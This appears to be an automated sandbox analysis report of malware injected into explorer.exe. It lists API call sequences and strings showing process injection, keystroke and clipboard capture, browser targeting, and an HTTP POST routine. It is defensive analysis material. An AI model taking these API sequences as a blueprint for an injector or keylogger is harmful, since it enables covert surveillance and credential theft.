Opcode ID: deeee95f3bd46ff30e3176e8a61dc90dd6eea73f4c86b4a940bb470ff21184f1
Instruction ID: 31b629b9df2a73af95de90739bfef73f464a0266a5217f3dfc158e275eeba735
Opcode Fuzzy Hash: deeee95f3bd46ff30e3176e8a61dc90dd6eea73f4c86b4a940bb470ff21184f1
Instruction Fuzzy Hash: 5A31AC75700612ABCB68DF29C894BA6B7ECBF15315B14456CE8C6CB200E735E846CBA0

Analysis Process: explorer.exePID: 3324, Parent PID: 1244COMMON

Execution Graph

Execution Coverage:	8.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	9
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 000E355C Relevance: 1.6, APIs: 1, Instructions: 73
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 000E35D8

Memory Dump Source

Source File: 00000019.00000002.605299369.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e1000_explorer.jbxd

Yara matches

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
Instruction ID: 35eb1cebd07adc1b18c6b69b15e046bd059cdd6563af234ede06875f38d9c43f
Opcode Fuzzy Hash: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
Instruction Fuzzy Hash: 9B119430715E495FEB5CBBB9989D2B93BE0EB54301F54412AA419D76A2DE398A40C701

Function 000E3220 Relevance: 9.2, APIs: 6, Instructions: 241
processstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 000E3266
Process32First.KERNEL32 ref: 000E3289
lstrcmpi.KERNEL32 ref: 000E32A4
Process32Next.KERNEL32 ref: 000E3532
CloseHandle.KERNELBASE ref: 000E3543
SleepEx.KERNEL32 ref: 000E354E

Memory Dump Source

Source File: 00000019.00000002.605299369.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e1000_explorer.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32lstrcmpi
String ID:
API String ID: 1122579583-0
Opcode ID: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
Instruction ID: 3c1d8b55e3ff178904e20a1481308595a5ff600b8310a3f59a15f7a6f8feadba
Opcode Fuzzy Hash: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
Instruction Fuzzy Hash: 3E813131218A488FE75AEF55EC58FEBB7E1FB50740F54461AA442D71A0EF78EA04CB81

Function 000EA048 Relevance: 4.7, APIs: 3, Instructions: 223
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 000EA147
VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-0000000E), ref: 000EA1BB
VirtualProtect.KERNELBASE ref: 000EA1D9

Memory Dump Source

Source File: 00000019.00000002.605299369.00000000000E7000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e7000_explorer.jbxd

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
Instruction ID: 1942967e0a7e8a8ee5ce9eacee8d3334c4da41f6bf0ae595b40eab4127ce933e
Opcode Fuzzy Hash: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
Instruction Fuzzy Hash: DF51993135899D0ECB34AA399CC47B9B7C1E75F321F18066AC08AD3285D919F8868383

Analysis Process: explorer.exePID: 3388, Parent PID: 1244COMMON

Execution Graph

Execution Coverage:	14.9%
Dynamic/Decrypted Code Coverage:	97.6%
Signature Coverage:	18.6%
Total number of Nodes:	328
Total number of Limit Nodes:	7

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 000C1016 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 193
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000C2724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,000C29F3,-00000001,000C128C), ref: 000C2731

Part of subcall function 000C2A09: GetProcessHeap.KERNEL32(00000008,0000A000,000C10BF), ref: 000C2A0C
Part of subcall function 000C2A09: RtlAllocateHeap.NTDLL(00000000), ref: 000C2A13

RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 000C1038
RtlMoveMemory.NTDLL(00000000,?,?), ref: 000C106C
NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 000C1075
GetCurrentProcessId.KERNEL32(?,000C1010), ref: 000C107B
wsprintfA.USER32 ref: 000C10E7
RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 000C1155
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000C1160
Process32First.KERNEL32(00000000,?), ref: 000C117F
CharLowerA.USER32(?), ref: 000C1199
lstrcmpi.KERNEL32(?,explorer.exe), ref: 000C11B5
lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 000C1212
Process32Next.KERNEL32(00000000,00000128), ref: 000C126C
CloseHandle.KERNELBASE(00000000), ref: 000C127F
Sleep.KERNELBASE(000003E8), ref: 000C129F

Strings

keylog_rules=, xrefs: 000C110D
|:|, xrefs: 000C1125
explorer.exe, xrefs: 000C11AB
microsoftedgecp.exe, xrefs: 000C1208
%s%s, xrefs: 000C10E1

Memory Dump Source

Source File: 0000001C.00000002.605313195.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_c1000_explorer.jbxd

Similarity

API ID: MemoryMove$HeapProcessProcess32lstrcmpi$AllocateCharCloseCreateCurrentFirstHandleLowerNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtualwsprintf
String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
API String ID: 3206029838-2805246637
Opcode ID: 99e3216da8f4614e5ef2b12c6cbcb6366dd348c3966ad96c1822504ed2a13e78
Instruction ID: 0e9037b1a23d498d9eef44ef847a7222ad4cab352246f22d42649b873d6f71e1
Opcode Fuzzy Hash: 99e3216da8f4614e5ef2b12c6cbcb6366dd348c3966ad96c1822504ed2a13e78
Instruction Fuzzy Hash: 235114352147019BE714EF74DC98FFE37E9EB45300F10462CB942872E3DB389A458A62

Function 000C10A5 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 151
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000C2A09: GetProcessHeap.KERNEL32(00000008,0000A000,000C10BF), ref: 000C2A0C
Part of subcall function 000C2A09: RtlAllocateHeap.NTDLL(00000000), ref: 000C2A13

wsprintfA.USER32 ref: 000C10E7

Part of subcall function 000C276D: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 000C2777
Part of subcall function 000C276D: MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,000C10FE), ref: 000C2789

RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 000C1155
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000C1160
Process32First.KERNEL32(00000000,?), ref: 000C117F
CharLowerA.USER32(?), ref: 000C1199
lstrcmpi.KERNEL32(?,explorer.exe), ref: 000C11B5
lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 000C1212
Process32Next.KERNEL32(00000000,00000128), ref: 000C126C
CloseHandle.KERNELBASE(00000000), ref: 000C127F
Sleep.KERNELBASE(000003E8), ref: 000C129F

Strings

keylog_rules=, xrefs: 000C110D
|:|, xrefs: 000C1125
explorer.exe, xrefs: 000C11AB
microsoftedgecp.exe, xrefs: 000C1208
%s%s, xrefs: 000C10E1

Memory Dump Source

Source File: 0000001C.00000002.605313195.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_c1000_explorer.jbxd

Similarity

API ID: FileHeapProcess32lstrcmpi$AllocateCharCloseCreateFirstHandleLowerMappingMemoryMoveNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
API String ID: 3018447944-2805246637
Opcode ID: 9deb01827ac776a51df14ae706493a07813ed851d989cd2001199b3ce524d063
Instruction ID: 65a32b94eeba30fb37388cade614e901b3f724369e7f64ce63652e8e70c925c7
Opcode Fuzzy Hash: 9deb01827ac776a51df14ae706493a07813ed851d989cd2001199b3ce524d063
Instruction Fuzzy Hash: 6341F5352143019BE714EF649C95FFE73E9EB89740F00462CB942972D3EF389E0A8A61

Function 000C9AE0 Relevance: 6.2, APIs: 4, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001C.00000002.605313195.00000000000C8000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_c8000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a90a3da1134cbd6d7394e945c6328cb317c31726ecd2c7108728ae9c5fb7b2a
Instruction ID: 5d373d380bc8d33ca3e460cf90b4df01c8f54fbf82947dc495f7be0379535973
Opcode Fuzzy Hash: 5a90a3da1134cbd6d7394e945c6328cb317c31726ecd2c7108728ae9c5fb7b2a
Instruction Fuzzy Hash: DF5106B1A442526AD7218B78DDC8FADB7E4EB51320B28073DD5E6CB3C6E7945C06C7A0

Function 000C276D Relevance: 3.0, APIs: 2, Instructions: 23
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 000C2777
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,000C10FE), ref: 000C2789

Memory Dump Source

Source File: 0000001C.00000002.605313195.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_c1000_explorer.jbxd

Similarity

API ID: File$MappingOpenView
String ID:
API String ID: 3439327939-0
Opcode ID: a635665d7b2318b096fc45d1b7df7a032460b18c1cdb8dc854a067880cfac442
Instruction ID: f61162d414438c38522cd182f7daa421870211b257a0bea1096e69927b45a71d
Opcode Fuzzy Hash: a635665d7b2318b096fc45d1b7df7a032460b18c1cdb8dc854a067880cfac442
Instruction Fuzzy Hash: A4D0E232715221ABE2746BBA6C0CF87AE9DDF86AA1B114125B50DD2150D6648810C2B0

Function 000C2A09 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,0000A000,000C10BF), ref: 000C2A0C
RtlAllocateHeap.NTDLL(00000000), ref: 000C2A13

Memory Dump Source

Source File: 0000001C.00000002.605313195.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_c1000_explorer.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: acd67665e468933ac110cf8aaf04359a017c7f809d1efca19bac9904b56a1078
Instruction ID: 44ddc3e53d7fc330c908ae40a164f077d9b6d1530eb3605bc688a08ab2fa2283
Opcode Fuzzy Hash: acd67665e468933ac110cf8aaf04359a017c7f809d1efca19bac9904b56a1078
Instruction Fuzzy Hash: C2A002B26601006BFD4457E49D1DF157658B744701F10C5447246C50509D7955448721

Function 000C29BD Relevance: 1.3, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00040744,00003000,00000040,000C12D9,00000000,00000000,?,00000001), ref: 000C29C7

Memory Dump Source

Source File: 0000001C.00000002.605313195.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_c1000_explorer.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 71e878e75d6082f9d5ba38c0e3662c3b0d55d339f5071642929824413c13a8ed
Instruction ID: 4d509c70b3cc56080b4199e8b3182924645f0e14b97ef127793cfc853709a618
Opcode Fuzzy Hash: 71e878e75d6082f9d5ba38c0e3662c3b0d55d339f5071642929824413c13a8ed
Instruction Fuzzy Hash: 85A002B17E5300BAFD69A7519D2FF153A189740F02F208145B30A7C1D056E8B600893D

Function 000C29AE Relevance: 1.3, APIs: 1, Instructions: 5
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNELBASE(00000000,00000000,00008000,000C13A4), ref: 000C29B6

Memory Dump Source

Source File: 0000001C.00000002.605313195.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_c1000_explorer.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: db50c5d8a102c95c7d20eb5ab4ef99f45e466021c69ff63b6bb9e1a799fb318c
Instruction ID: 31dd2fa8e07d9bb98dafe1dc03b535656cc5c0c6ad4852bd1be97c2afe809df2
Opcode Fuzzy Hash: db50c5d8a102c95c7d20eb5ab4ef99f45e466021c69ff63b6bb9e1a799fb318c
Instruction Fuzzy Hash: 03A002717A070076FD7457605D1AF0576547740B02F3085447245A80D049A9A1488A18

Non-executed Functions

Function 000C18BF Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 208
injectionnativesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000C2724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,000C29F3,-00000001,000C128C), ref: 000C2731

OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000000,00000001), ref: 000C18F4
NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 000C192F
NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 000C19BF
RtlMoveMemory.NTDLL(00000000,000C3638,00000016), ref: 000C19E6
RtlMoveMemory.NTDLL(-00000016,00000363), ref: 000C1A0E
NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 000C1A1E
CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000C1A38
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 000C1A40
CloseHandle.KERNEL32(00000000), ref: 000C1A4E
Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 000C1A55
GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 000C1A6B
GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 000C1A72
ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 000C1A88
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 000C1AB2
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000C1AC5
CloseHandle.KERNEL32(00000000), ref: 000C1ACC
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 000C1AD3
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 000C1AE7
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 000C1AFE
CloseHandle.KERNEL32(00000000), ref: 000C1B0B
CloseHandle.KERNEL32(?), ref: 000C1B11
CloseHandle.KERNEL32(?), ref: 000C1B17
CloseHandle.KERNEL32(00000000), ref: 000C1B1A

Strings

ntdll, xrefs: 000C1A66
opera_shared_counter, xrefs: 000C1A31
atan, xrefs: 000C1A61

Memory Dump Source

Source File: 0000001C.00000002.605313195.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_c1000_explorer.jbxd

Similarity

API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
String ID: atan$ntdll$opera_shared_counter
API String ID: 1066286714-2737717697
Opcode ID: 9e424bfddfcf2250cd6ecd80b675fed99075bf222c9483c73a16eac78e681340
Instruction ID: abebfd9c9de8a5803ea088a1e7a5a8bc147661f29964b982ce2a24cbbf0e8576
Opcode Fuzzy Hash: 9e424bfddfcf2250cd6ecd80b675fed99075bf222c9483c73a16eac78e681340
Instruction Fuzzy Hash: EA616A72204305AFE710DB649C84EAFBBECEB8A754F10451DF94993292DB74DE048BA2

Function 000C2799 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68
encryptionstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 000C27B5
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 000C27CD
lstrlen.KERNEL32(?,00000000), ref: 000C27D5
CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 000C27E0
CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 000C27FA
wsprintfA.USER32 ref: 000C2811
CryptDestroyHash.ADVAPI32(?), ref: 000C282A
CryptReleaseContext.ADVAPI32(?,00000000), ref: 000C2834

Strings

%02X, xrefs: 000C280B

Memory Dump Source

Source File: 0000001C.00000002.605313195.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_c1000_explorer.jbxd

Similarity

API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
String ID: %02X
API String ID: 3341110664-436463671
Opcode ID: fd74d833290c78547abcf1de5dffbf351a85f34bb6135ab56120f26d07ed3cd1
Instruction ID: 02fc7693972bb534bd5ff68773a41b3fc752aac871128042c803a7d2e0d72131
Opcode Fuzzy Hash: fd74d833290c78547abcf1de5dffbf351a85f34bb6135ab56120f26d07ed3cd1
Instruction Fuzzy Hash: 68113D72900108BFEB119B95EC88FEEBFBCEB48711F208065FA05E2160DB754F459B60

Function 000C162B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 000C1652
ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 000C167A

Strings

, xrefs: 000C1699

Memory Dump Source

Source File: 0000001C.00000002.605313195.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_c1000_explorer.jbxd

Similarity

API ID: KeyboardStateUnicode
String ID:
API String ID: 3453085656-3916222277
Opcode ID: c7f5e0c05c983241755568638e6dd1c75d03a30b827a3dd7953169309d4b6611
Instruction ID: 2d71e2b6ea4b624a9cbae3ef7ccfe3706d6ea43bfabe9a87450ac1a19cf092a0
Opcode Fuzzy Hash: c7f5e0c05c983241755568638e6dd1c75d03a30b827a3dd7953169309d4b6611
Instruction Fuzzy Hash: 650161329002199BEB34DB64DD45FFF73BCAF46700F08841EE901E2152D734E9459AA1

Function 000C13AE Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 144
libraryloaderthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlZeroMemory.NTDLL(000C5013,0000001C), ref: 000C13C8
VirtualQuery.KERNEL32(000C13AE,?,0000001C), ref: 000C13DA
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 000C140B
GetCurrentProcessId.KERNEL32(00000004), ref: 000C141C
wsprintfA.USER32 ref: 000C1433
CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 000C1448
GetLastError.KERNEL32 ref: 000C144E
RtlInitializeCriticalSection.NTDLL(000C582C), ref: 000C1465
Sleep.KERNEL32(000001F4), ref: 000C1489
GetModuleHandleA.KERNEL32(user32.dll,TranslateMessage), ref: 000C14A6
GetProcAddress.KERNEL32(00000000), ref: 000C14AF
GetModuleHandleA.KERNEL32(user32.dll,GetClipboardData), ref: 000C14D0
GetProcAddress.KERNEL32(00000000), ref: 000C14D3
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 000C14F1
CreateThread.KERNEL32(00000000,00000000,Function_0000082D,00000000,00000000,00000000), ref: 000C150D
CloseHandle.KERNEL32(00000000), ref: 000C1514
RtlExitUserThread.NTDLL(00000000), ref: 000C152A

Strings

kernel32.dll, xrefs: 000C14EC
TranslateMessage, xrefs: 000C149C
user32.dll, xrefs: 000C14A1, 000C14CB
%s%d%d%d, xrefs: 000C142D
GetClipboardData, xrefs: 000C14C6

Memory Dump Source

Source File: 0000001C.00000002.605313195.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_c1000_explorer.jbxd

Similarity

API ID: HandleModule$AddressCreateProcThread$CloseCriticalCurrentErrorExitFileInitializeLastMemoryMutexNameProcessQuerySectionSleepUserVirtualZerowsprintf
String ID: %s%d%d%d$GetClipboardData$TranslateMessage$kernel32.dll$user32.dll
API String ID: 3628807430-1779906909
Opcode ID: 60bfaaf54ac5fe15c88d4a82a297f1d8f0a4b47b245a6985dbd55d8607063b04
Instruction ID: 429d8b2511cd56256381a213a5eba760fd92a43267dc1a0208b5131e50701b55
Opcode Fuzzy Hash: 60bfaaf54ac5fe15c88d4a82a297f1d8f0a4b47b245a6985dbd55d8607063b04
Instruction Fuzzy Hash: 5541B475610704EBE710BFA5EC19F9F3BACFB86751B10801CF606C6292DB79E9448BA1

Function 000C16B9 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 90
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlEnterCriticalSection.NTDLL(000C582C), ref: 000C16C4
lstrlenW.KERNEL32 ref: 000C16DB
lstrlenW.KERNEL32 ref: 000C16F3
wsprintfW.USER32 ref: 000C1743
GetForegroundWindow.USER32 ref: 000C174E
GetWindowTextW.USER32(00000000,000C5850,00000800), ref: 000C1767
GetClassNameW.USER32(00000000,000C5850,00000800), ref: 000C1774
lstrcmpW.KERNEL32(000C5020,000C5850), ref: 000C1781
lstrcpyW.KERNEL32(000C5020,000C5850), ref: 000C178D
wsprintfW.USER32 ref: 000C17AD
lstrcatW.KERNEL32 ref: 000C17C6
RtlLeaveCriticalSection.NTDLL(000C582C), ref: 000C17D3

Strings

%s%s%s, xrefs: 000C1738
%s%s%s%s, xrefs: 000C17A2
New Window Caption -> , xrefs: 000C179A
Clipboard -> , xrefs: 000C1730

Memory Dump Source

Source File: 0000001C.00000002.605313195.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_c1000_explorer.jbxd

Similarity

API ID: CriticalSectionWindowlstrlenwsprintf$ClassEnterForegroundLeaveNameTextlstrcatlstrcmplstrcpy
String ID: Clipboard -> $ New Window Caption -> $%s%s%s$%s%s%s%s
API String ID: 2651329914-3371406555
Opcode ID: c457d83e07117960512ff9d6a17b9ba568e2bd8b3c9ab155dcc0e5576c0cd205
Instruction ID: d9cfb5cf3cda6128c3be6f45b3d1eb27ed0ef66761b79a0610489f4e331d032e
Opcode Fuzzy Hash: c457d83e07117960512ff9d6a17b9ba568e2bd8b3c9ab155dcc0e5576c0cd205
Instruction Fuzzy Hash: 7B21EA35514A04AFE3212725EC49FAF3AB8EB42B56724812CF901E6163DE299D4186F1

Function 000C25F1 Relevance: 15.1, APIs: 10, Instructions: 51
threadprocessinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 000C2603
GetCurrentThreadId.KERNEL32 ref: 000C260B
CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000C261B
Thread32First.KERNEL32(00000000,0000001C), ref: 000C2629
OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 000C2648
SuspendThread.KERNEL32(00000000), ref: 000C2658
CloseHandle.KERNEL32(00000000), ref: 000C2667
Thread32Next.KERNEL32(00000000,0000001C), ref: 000C2677
CloseHandle.KERNEL32(00000000), ref: 000C2682

Memory Dump Source

Source File: 0000001C.00000002.605313195.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_c1000_explorer.jbxd

Similarity

API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
String ID:
API String ID: 1467098526-0
Opcode ID: 482480d4485ccb4042bcb79c26a38b2d3f92576c04d7d6c7939b397cd361f68e
Instruction ID: 3ae33d7cffd26bcd6b12822e8c43ac7e6746d3b8ffc9d300f9efa9b112ea700d
Opcode Fuzzy Hash: 482480d4485ccb4042bcb79c26a38b2d3f92576c04d7d6c7939b397cd361f68e
Instruction Fuzzy Hash: D4117C72414300EFE7119F60AC5CF6EBAA4FF84B05F20842DFA4592150D7388A099BA3

Function 000C20A1 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000C2A09: GetProcessHeap.KERNEL32(00000008,0000A000,000C10BF), ref: 000C2A0C
Part of subcall function 000C2A09: RtlAllocateHeap.NTDLL(00000000), ref: 000C2A13

Part of subcall function 000C298A: lstrlen.KERNEL32(000C4FE2,?,00000000,00000000,000C20DD,75712B62,000C4FE2,00000000), ref: 000C2992
Part of subcall function 000C298A: MultiByteToWideChar.KERNEL32(00000000,00000000,000C4FE2,00000001,00000000,00000000), ref: 000C29A4

Part of subcall function 000C24CC: RtlZeroMemory.NTDLL(?,00000018), ref: 000C24DE

RtlZeroMemory.NTDLL(?,0000003C), ref: 000C2139
wsprintfW.USER32 ref: 000C2272
wsprintfW.USER32 ref: 000C22DD
RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 000C23A7

Strings

POST, xrefs: 000C2223
Accept: */*Referer: %S, xrefs: 000C2268
Host: %s, xrefs: 000C22D7
Content-Type: application/x-www-form-urlencoded, xrefs: 000C2301

Memory Dump Source

Source File: 0000001C.00000002.605313195.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_c1000_explorer.jbxd

Similarity

API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
API String ID: 4204651544-1701262698
Opcode ID: aef6b5e180c2f1518824fd913e4bc16fbd488efc624a28f5f9e6db917ccf4602
Instruction ID: 8599106d641ffb9abdf09edb373c92b4994641701acf05219b067619d305f964
Opcode Fuzzy Hash: aef6b5e180c2f1518824fd913e4bc16fbd488efc624a28f5f9e6db917ccf4602
Instruction Fuzzy Hash: F6A16A71608341AFD350DF69D884E6FBBE8EF88740F14482DF985D7262DA78DE048B62

Function 000C12AE Relevance: 7.6, APIs: 5, Instructions: 93
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000C29BD: VirtualAlloc.KERNELBASE(00000000,00040744,00003000,00000040,000C12D9,00000000,00000000,?,00000001), ref: 000C29C7

lstrlen.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 000C12DC

Part of subcall function 000C2A09: GetProcessHeap.KERNEL32(00000008,0000A000,000C10BF), ref: 000C2A0C
Part of subcall function 000C2A09: RtlAllocateHeap.NTDLL(00000000), ref: 000C2A13

PathMatchSpecA.SHLWAPI(?,00000000), ref: 000C138A

Part of subcall function 000C2841: lstrlen.KERNEL32(00000000,?,?,00000001,00000000,000C1119,00000001), ref: 000C2850
Part of subcall function 000C2841: lstrlen.KERNEL32(keylog_rules=,?,?,00000001,00000000,000C1119,00000001), ref: 000C2855

RtlZeroMemory.NTDLL(00000000,00000104), ref: 000C1316
RtlMoveMemory.NTDLL(00000000,?,?), ref: 000C1332

Part of subcall function 000C2569: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,000C136E), ref: 000C2591
Part of subcall function 000C2569: RtlMoveMemory.NTDLL(00000FA4,00000000,00000000), ref: 000C259A

RtlMoveMemory.NTDLL(00000000,?,?), ref: 000C135F

Memory Dump Source

Source File: 0000001C.00000002.605313195.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_c1000_explorer.jbxd

Similarity

API ID: Memorylstrlen$Move$Heap$AllocAllocateMatchPathProcessSpecVirtualZero
String ID:
